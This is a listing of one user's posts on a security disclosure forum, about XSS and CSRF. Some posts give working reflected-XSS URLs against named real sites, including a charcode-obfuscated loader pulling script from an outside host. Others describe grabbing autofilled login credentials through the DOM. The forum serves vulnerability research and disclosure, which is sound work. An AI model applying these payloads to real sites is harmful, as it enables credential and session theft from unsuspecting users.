sla.ckers.org is ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Pages: 1 2 Next
Current Page: 1 of 2
Results 1 - 30 of 43
7 years ago
Girzi
OK, thank you for the help! I'll try to find some information myself.
Forum: OMG Ponies
7 years ago
Girzi
Yeah, I understood very well, don't worry =). Another way to use CSRF is by using Flash files... With an <img> tag you can only do GET requests, nothing more.
Forum: CSRF and Session Info
7 years ago
Girzi
You can make a POST request with a form that auto-submits, or with XMLHttpRequest... With the <img> tag, you can also use the DOM: var image = new Image(); image.src="http://ha.ckers.org"; will end with a GET request to ha.ckers.org. Well, nothing new =)
Forum: CSRF and Session Info
7 years ago
Girzi
Ahhhh OK, thx! I didn't know this one O_o I think I have to learn some details about encoding, it's very interesting stuff for bypassing filters, I saw =) Thank you! PS: Do you have some interesting links about this stuff xD?
Forum: XSS Info
7 years ago
Girzi
Thx for the information !
Forum: XSS Info
7 years ago
Girzi
Okay =) I found an XSS on Lycos: http://shopping.lycos.fr/query.html?qu=sex&x=19&y=14&tld=com&family=off&inpcatvalue=shopping&cat=%22%3E%3Cscript%20src=%22http://blwood.net/experiences/lycos2.js%22%3E (variable cat, easy one). I included a script on http://blwood.net/experiences/lycos2.js On this page there's a login form: http://secure.caramail.lycos.fr/s
Forum: XSS Info
7 years ago
Girzi
: / I did some tests, using a <script src="http://url./script.js"></script> for my XSS. I used document.getElementById('iframe_id').document.getElementById('username_field_id').value like you, but it didn't work. I asked on a JavaScript developers' board and they told me that I can't, because it comes from the browser's security : /
Forum: XSS Info
7 years ago
Girzi
Quote Let's say example.com/some/other/file.php was vulnerable to XSS and the login form was on examples.com/login.php. I would inject into /some/other/file.php (the only place I can), then I'd create an iframe to /login.php. Since both files are on the same domain /some/other/file.php has full control over the source code of the iframe and can therefore read the forms. If /login.php simply for
Forum: XSS Info
7 years ago
Girzi
Haha, nice list :) I died laughing when I saw hackin9.org on the list!!
Forum: Full Disclosure
7 years ago
Girzi
Yeah, this one works: http://www.homme.lycos.fr/hotbabes/categorie/%22%20%20%3Cbody%20onload=alert(%22XSS%22)%3E But I had to use encoding because it doesn't like my / =) Anyway, I found another, much better XSS. Thx for the help rsnake :)
Forum: XSS Info
7 years ago
Girzi
Here is it : http://www.homme.lycos.fr/hotbabes/categorie/%22%20%3Cbody%20onload=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,98,108,119,111,111,100,46,110,101,116,47,101,120,112,101,114,105,101,110,99,101,115,47,108,121,99,111,115,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41,59))%3
Forum: XSS Info
7 years ago
Girzi
Hi, I'm using a reflecting XSS to make something like <script src="http://domain.com/myfile.js"></script>, but I had to encode it and use eval + String.fromCharCode. Now myfile.js contains this code: document.write('<iframe src="http://domaine.com/"></iframe>'); In IE it works! But FF doesn't want it! Do you know why? Thanks for the help.
Forum: XSS Info
7 years ago
Girzi
The project was accepted today by the big boss =) Now I'll have to work on it : )
Forum: XSS Info
7 years ago
Girzi
Hi =) I wanted to know if somebody will go to Black Hat Europe 2007 in Amsterdam, because I'm from Belgium and it's near, so I wanted to go to a security conference for the first time =) Do you have some information about it? Do you know other good conferences in Europe? Thanks for the help =)!
Forum: OMG Ponies
7 years ago
Girzi
Thank you I'll have a look at this stuff : )
Forum: XSS Info
7 years ago
Girzi
Yes, CSRF is very useful =) But when you've found an XSS, how do you want to protect against flood / spam? I mean, for example in Gmail, there is a request to send a mail to someone, but you can't send the request from outside because there's a special number - "a token". But with the XSS you don't need this token anymore, because you are logged in and you use it. So thanks to the XSS you can send email, that'
Forum: CSRF and Session Info
7 years ago
Girzi
Buna blad3! Romaniiia =) My origins are Romanian (parents), I can speak Romanian too ;) Anyway, it's cool =) Welcome here, I'm sure you'll enjoy the board : )
Forum: Intro
7 years ago
Girzi
Wooooowwww =) I want the same in my house :P Okay, tomorrow I'll try to make some pictures of my little computer and my little connection of French books :( : /
Forum: OMG Ponies
7 years ago
Girzi
Well, for a reflecting XSS most of the time they don't answer, because you can't do damage immediately on the site. You need to exploit so else. I mean a click or something else... But for permanent XSS you can do BIIIIG damage =) Usually they answer. For reflecting XSS I usually just don't contact them...
Forum: Full Disclosure
7 years ago
Girzi
Hahahaha, nice one =) You have to profit from an XSS or a CSRF if possible to do that. What do you call this technique? I mean, to make someone believe something. Also, how do you log username/password from an htaccess o_O I've never heard of that before. Do you know of some information / papers about these techniques? Thank you boss : )
Forum: XSS Info
7 years ago
Girzi
No problem ;-) Well, at the moment it's just a project, I'm not sure if it's sure. I have to write like a paper for a French magazine about XSS, but from the first one to the situation in 2006. I mean I have to follow the history of XSS, the development of XSS, their increase in power through the ages, with examples and source code =). Do you follow me? (Sorry for my bad English :P) When I say a paper
Forum: XSS Info
7 years ago
Girzi
Nice one =) What about this one: http://www.homme.lycos.fr/hotbabes/categorie/%22%3E%3Cbody%20onload=alert(%22Blwood%22)%3E Very well known in France ;) webmail, search... Let's do an XSS challenge :P ?
Forum: Full Disclosure
7 years ago
Girzi
2 xss on gov.be domain =) Cause I'm from Belgium : P http://directory.gov.be/home/top/category_id/%22%3E%3Cimg%20src=qsd%20onerror=alert(2006)%3E POST /home/search search_string=%22%3E%3Cscript%3Ealert%28%2FBlwood%2F%29%3C%2Fscript%3E&Submit2=Chercher+dans+directory
Forum: Full Disclosure
7 years ago
Girzi
Yeah, you're right, an .htaccess is a solution. But .htaccess is the solution for every authentication... So I mean it's a perfect solution from a security point of view, but for interactivity it's very annoying... : /
Forum: XSS Info
7 years ago
Girzi
Okay : ) Thx for all this information, now I'll do some research =) Thx : )
Forum: XSS Info
7 years ago
Girzi
Thank you very much for all these links, rsnake and dev80! Do you have more information about the first HTML injection defacement? I mean ChatTropolis, because it's a very, very interesting anecdote!
Forum: XSS Info
7 years ago
Girzi
http://www.whiteacid.org/misc/string%20to%20code.html Perfect ! :=)
Forum: XSS Info
7 years ago
Girzi
lol : ) We'll wait for what the boss will say. PS: very handy script: http://www.whiteacid.org/misc/code%20to%20string.html It will be even more handy if you implement the inverse =) Code => String String => Code =)
Forum: XSS Info
7 years ago
Girzi
Well, I think the only solution is to sanitize variables properly... If there's no XSS you can't use this flaw. Well, I know it's a bad answer, but I don't think there's something else to do.
Forum: XSS Info
7 years ago
Girzi
So you wait 2 seconds so that Firefox can fill the inputs with the interesting values (setTimeout) and then you get the values with the DOM (document.getElementsByName(String.fromCharCode(108,110))[0].value) => here ln. Now I'm 100 % close =) ?
Forum: XSS Info